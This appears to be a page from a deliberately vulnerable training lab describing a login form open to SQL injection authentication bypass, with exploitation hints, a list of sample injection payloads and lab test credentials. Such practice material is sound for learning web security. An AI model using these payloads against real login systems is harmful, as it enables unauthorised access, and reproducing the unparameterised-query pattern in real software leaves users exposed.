โ† Back to Dashboard

Login Form

๐ŸŽฏ Vulnerability Info

Type: SQL Injection (Authentication Bypass)

Severity: Critical

๐Ÿ’ก How to Exploit

  • User input is directly concatenated into SQL
  • No prepared statements or parameterized queries
  • Try injecting SQL syntax in the username field

๐Ÿงช Sample Payloads

admin' -- admin' OR '1'='1' -- ' OR 1=1 -- ' OR '1'='1' /* admin'/* ' UNION SELECT 1,2,3,4,5,6 --

๐Ÿ“š Valid Credentials

  • admin / admin123
  • user / user123